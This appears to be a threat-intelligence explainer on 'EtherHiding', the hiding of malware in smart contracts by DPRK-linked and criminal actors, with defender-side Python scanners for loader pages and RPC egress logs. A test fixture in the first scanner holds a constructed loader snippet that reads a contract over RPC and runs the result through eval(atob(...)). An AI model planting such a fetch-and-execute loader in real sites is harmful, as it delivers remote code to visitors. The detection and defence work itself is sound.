
Introduction: the problem and definition
Google’s Threat Intelligence Group (GTIG) reports that a North Korea–linked threat cluster tracked as UNC5342 has adopted “EtherHiding”—a technique that stores malicious code and control data inside smart contracts on public blockchains (notably Ethereum and BNB Smart Chain). This marks the first time GTIG has seen a nation-state actor use this method to deliver malware and steal cryptocurrency, raising the bar for takedowns because smart-contract data is decentralized, highly available, and effectively immutable once deployed.
In brief
- Who: DPRK-linked UNC5342 (nation-state) and, in a parallel track, UNC5142 (financially motivated) also abusing the same tactic.
- What: “EtherHiding” to host payloads/instructions in smart contracts, fetched at runtime by compromised sites/scripts.
- Why it’s hard to stop: smart contracts are public, resilient, and undeletable; even if tagged as malicious, code remains accessible.
- Impact: malware distribution, credential/crypto theft, and durable C2-style infrastructure that is hard to disrupt via traditional takedowns.
Context / history / connections
The EtherHiding idea surfaced in 2023–2024 among cybercriminals, then matured as researchers detailed how malicious JavaScript or configuration can live on-chain and be retrieved on demand. GTIG/Mandiant tracked UNC5142 using EtherHiding since late 2023 to spread stealers like Vidar, Lumma, Rhadamanthys (RADTHIEF) and Atomic (AMOS) via compromised WordPress sites. The new twist: UNC5342 (DPRK) operationalized the same technique for state-backed goals in 2025.
This sits within a broader DPRK trend: increasingly sophisticated crypto-theft and developer-targeted operations, which have already yielded multi-billion-dollar crypto losses in 2025.
Technical analysis / details of the vulnerability
Attack surface & delivery
- Initial access / lure. UNC5342 campaigns use social-engineering themes (e.g., “Contagious Interview” developer lures) that direct targets to compromised legitimate websites. These pages carry injected scripts.
- On-chain retrieval. Instead of pulling payloads from a conventional attacker server, the script calls public RPC endpoints (e.g., BNB Smart Chain/Ethereum providers) using libraries like web3/ethers. It reads data fields or event logs from specific smart contracts that store obfuscated code, URLs, or configuration.
- De-obfuscation & staging. The browser (or loader) de-obfuscates the blob and either executes in-browser JS (for drive-by behaviors) or fetches a next-stage payload (e.g., stealer/downloader) from a rotating set of hosts referenced inside the on-chain data—achieving bulletproof “content addressing” via the blockchain.
- Persistence & redundancy. Because smart contracts are immutable, defenders cannot remove malicious data. Even if one RPC or CDN blocks access, alternative RPC providers or full nodes continue to serve the same contract state. This makes sinkholing/takedown far less effective than with traditional C2.
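As an added example (not code from GTIG or from the article), a defender-side static check for the loader pattern described in the list above: it scans served HTML for a web3/ethers library loaded on a site with no Web3 feature, an inline script that reads a contract and hands the decoded result to eval/Function, and an inline event handler that bootstraps a fetch to a public RPC host. The sample pages, the CDN hostname and the contract address are constructed placeholders; the RPC hostnames are the ones named later in this article.

```python
import re
from dataclasses import dataclass

# Constructed indicators of an EtherHiding-style loader in a served page. Provider
# hostnames and library names follow the article; the sample pages and the contract
# address below are constructed placeholders, not real indicators.
RPC_HOST_RE = re.compile(r"rpc\.ankr\.com|cloudflare-eth\.com|bsc-dataseed\d*\.binance\.org", re.I)
WEB3_LIB_RE = re.compile(r"\b(ethers|web3)(\.min)?\.js\b", re.I)
RPC_METHOD_RE = re.compile(r"\beth_(call|getStorageAt|getLogs|getCode)\b")
CONTRACT_RE = re.compile(r"\b0x[0-9a-fA-F]{40}\b")
EXEC_RE = re.compile(r"\b(eval|Function|atob)\s*\(")
SCRIPT_SRC_RE = re.compile(r"<script[^>]+\bsrc=[\"']([^\"']+)[\"']", re.I)
INLINE_SCRIPT_RE = re.compile(r"<script(?![^>]*\bsrc=)[^>]*>(.*?)</script>", re.I | re.S)
EVENT_HANDLER_RE = re.compile(r"\son(load|error|click)\s*=\s*([\"'])(.*?)\2", re.I)

@dataclass
class Finding:
    indicator: str
    evidence: str

def scan_page(html: str, site_uses_web3: bool = False) -> list[Finding]:
    """Flag page content that reads from a smart contract and executes the result."""
    findings = []
    for src in SCRIPT_SRC_RE.findall(html):          # external web3/ethers on a non-Web3 site
        if WEB3_LIB_RE.search(src) and not site_uses_web3:
            findings.append(Finding("web3-library-on-non-web3-site", src))
    for body in INLINE_SCRIPT_RE.findall(html):      # inline script reading a contract
        contract = CONTRACT_RE.search(body)
        if contract and RPC_METHOD_RE.search(body):
            findings.append(Finding("on-chain-read-of-contract", contract.group(0)))
        execute = EXEC_RE.search(body)
        if contract and execute:                     # decoded blob handed to eval/Function
            findings.append(Finding("decode-and-execute-after-chain-read", execute.group(0)))
    for name, _quote, code in EVENT_HANDLER_RE.findall(html):   # bootstrap via inline handler
        if "fetch(" in code or RPC_HOST_RE.search(code):
            findings.append(Finding(f"bootstrap-in-on{name.lower()}-handler", code[:60]))
    return findings

PLACEHOLDER_CONTRACT = "0x" + "00" * 18 + "0bad"   # constructed placeholder address
BENIGN_PAGE = '<html><body><script src="/app.js"></script><script>console.log(1)</script></body></html>'
SUSPICIOUS_PAGE = """<html><body onload="fetch('https://rpc.ankr.com/bsc')">
<script src="https://cdn.example.invalid/ethers.min.js"></script>
<script>
const c = 'ADDR';
fetch(RPC, {method: 'POST', body: JSON.stringify({method: 'eth_call', params: [{to: c}]})})
  .then(r => r.text()).then(t => eval(atob(t)));
</script></body></html>""".replace("ADDR", PLACEHOLDER_CONTRACT)
```

Pass site_uses_web3=True for properties that legitimately ship a Web3 front end so the library indicator alone does not fire there.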
What’s new with UNC5342?
GTIG says UNC5342 is the first nation-state they’ve observed using EtherHiding to deliver malware and facilitate cryptocurrency theft, lifting a technique from cybercrime into the APT space and blending it with DPRK’s revenue-driven operations.
Parallel criminal activity (UNC5142).
Mandiant/GTIG highlight a financially motivated actor abusing the same pattern, pushing well-known infostealers via infected WordPress sites—illustrating how decentralized hosting is becoming a cross-ecosystem distribution primitive.
Practical consequences / risks
- Durable infrastructure: on-chain payloads/configs are hard to eradicate, complicating incident response and threat-infrastructure disruption.
- Detection blind spots: typical URL/domain IOCs are less useful; access may look like benign blockchain RPC traffic from the browser/server.
- Mass compromise leverage: once attackers seed many compromised CMS sites, each page becomes a launcher for the same on-chain data, enabling broad distribution without centralized hosting.
- Crypto-theft efficacy: DPRK’s past focus on crypto monetization aligns with EtherHiding’s resilience, increasing dwell time and revenue potential.
Operational recommendations / what to do next
Network & application controls
- Monitor and govern blockchain RPC usage from web properties and user endpoints (e.g., calls to rpc.ankr.com, cloudflare-eth.com, bsc-dataseed.binance.org, etc.). Alert when browser code on corporate sites queries unapproved smart contracts. (Derives from GTIG’s description of on-chain retrieval.)
- Apply a strict Content Security Policy (CSP) on web apps to limit where scripts can connect (connect-src) and which scripts can execute (script-src 'self' with nonces). This constrains drive-by fetches to blockchain APIs. (Best practice aligned to GTIG findings.)
- WAF/EDR detections: create detections for runtime web3/ethers usage patterns in unexpected contexts (e.g., corporate sites not involved in Web3).
Smart contract & IOC handling
- Track contract addresses identified by researchers and block or alert on page loads that query them via public RPCs. Maintain lists similar to IP/domain IOCs but at the contract-address level. (Guidance inferred from GTIG reports.)
- Multi-provider blocking: if one RPC provider removes access and others do not, enforce controls at your own egress rather than relying on third-party blocking alone. GTIG notes inconsistent cooperation among intermediaries.
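An added example (not from the article or GTIG) of the contract-address-level IOC handling the two lists above call for: it inspects constructed egress-proxy records of JSON-RPC traffic, alerts when a host outside an approved set talks to a public RPC provider, and flags reads of a watch-listed contract whichever provider served them (eth_call, eth_getStorageAt/eth_getCode, eth_getLogs, batched requests included). The watch-list address, the client host names and the log records are constructed; the provider hostnames are the ones named above.

```python
import json
import re

# Constructed watch-list and sample egress records. Provider hostnames are the ones named
# in the article; contract addresses and client host names are placeholders.
RPC_PROVIDER_RE = re.compile(r"(rpc\.ankr\.com|cloudflare-eth\.com|bsc-dataseed\d*\.binance\.org)$", re.I)
WATCHLIST = {"0x" + "00" * 18 + "0bad"}          # lowercase contract addresses (placeholder)
APPROVED_CLIENTS = {"web3-gateway-01"}            # hosts allowed to talk to public RPC providers

def contract_touched(rpc: dict):
    """Return the lowercase contract address a JSON-RPC read targets, or None."""
    method, params = rpc.get("method", ""), rpc.get("params") or []
    if method == "eth_call" and params and isinstance(params[0], dict):
        addr = params[0].get("to")                 # eth_call names the contract in 'to'
    elif method in ("eth_getStorageAt", "eth_getCode") and params:
        addr = params[0]                           # address is the first positional param
    elif method == "eth_getLogs" and params and isinstance(params[0], dict):
        addr = params[0].get("address")            # event-log reads filter by address
    else:
        return None
    return addr.lower() if isinstance(addr, str) else None

def evaluate(log_line: str) -> list[str]:
    """Alert on unapproved RPC egress and on reads of watch-listed contracts."""
    rec = json.loads(log_line)
    host, client, alerts = rec["dst_host"], rec["src"], []
    if not RPC_PROVIDER_RE.search(host):
        return alerts                              # not blockchain RPC traffic
    if client not in APPROVED_CLIENTS:
        alerts.append(f"unapproved-rpc-egress {client} -> {host}")
    try:
        body = json.loads(rec.get("body", ""))
    except json.JSONDecodeError:
        return alerts
    for rpc in body if isinstance(body, list) else [body]:   # JSON-RPC batches are lists
        addr = contract_touched(rpc)
        if addr in WATCHLIST:                      # same address, whichever provider served it
            alerts.append(f"watchlisted-contract {addr} via {host} ({rpc.get('method')})")
    return alerts

BAD = "0x" + "00" * 18 + "0BAD"                    # mixed case on the wire, normalised above
SAMPLE_LOG = [
    json.dumps({"src": "web3-gateway-01", "dst_host": "rpc.ankr.com", "body": json.dumps(
        {"jsonrpc": "2.0", "method": "eth_call", "params": [{"to": "0x" + "11" * 20}, "latest"], "id": 1})}),
    json.dumps({"src": "www-prod-03", "dst_host": "bsc-dataseed1.binance.org", "body": json.dumps(
        {"jsonrpc": "2.0", "method": "eth_call", "params": [{"to": BAD}, "latest"], "id": 2})}),
    json.dumps({"src": "www-prod-03", "dst_host": "cloudflare-eth.com", "body": json.dumps(
        [{"jsonrpc": "2.0", "method": "eth_getStorageAt", "params": [BAD, "0x0", "latest"], "id": 3}])}),
    json.dumps({"src": "www-prod-03", "dst_host": "cdn.example.invalid", "body": ""}),
]
```

The second and third records hit the same contract through two different providers, which is why the address rather than the RPC hostname is the durable indicator here.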
CMS hygiene (critical for WordPress)
- Patch CMS/core/plugins; eliminate unauthorized JS injections; monitor file-integrity for theme/plugin changes; inventory inline event handlers often used to bootstrap EtherHiding loaders. (Matches UNC5142/UNC5342 delivery vectors.)
User & developer protection
- Harden developer endpoints targeted by DPRK lures; enforce application allow-listing; isolate wallets from daily-driver machines; use passphrase managers/hardware wallets; and train staff to treat job/interview outreach and developer tool downloads with elevated suspicion.
Differences / comparisons with other cases
- Versus IPFS / paste sites / social-media C2: Those can be removed or accounts banned; smart contracts are immutable, so the same on-chain blob persists regardless of takedowns.
- Versus DNS dead-drops: DNS-based resolvers rely on registrars/hosters that can be seized; blockchain data is replicated across nodes and RPC providers, giving higher survivability.
Summary / key takeaways
- DPRK-linked UNC5342 has weaponized EtherHiding, making decentralized, resilient malware delivery a state-level capability.
- UNC5142 shows criminals are already using the same pattern at scale via compromised WordPress—expect copycats.
- Defenses must evolve beyond domain/IP IOCs to contract-address awareness, CSP hardening, RPC egress controls, and CMS integrity.
Sources / bibliography
- The Record (Recorded Future News): “North Korean hackers seen using blockchain to hide malware” (Oct 16–17, 2025).
- Google Cloud / GTIG: “DPRK adopts EtherHiding” (Oct 16, 2025).
- Google Cloud / GTIG + Mandiant: “UNC5142 leverages EtherHiding to distribute malware” (Oct 16, 2025).
- BleepingComputer: “North Korean hackers use EtherHiding to hide malware on the blockchain” (Oct 16, 2025).
- BankInfoSecurity: “Hackers Use Blockchain to Hide Malware in Plain Sight” (Oct 16, 2025).

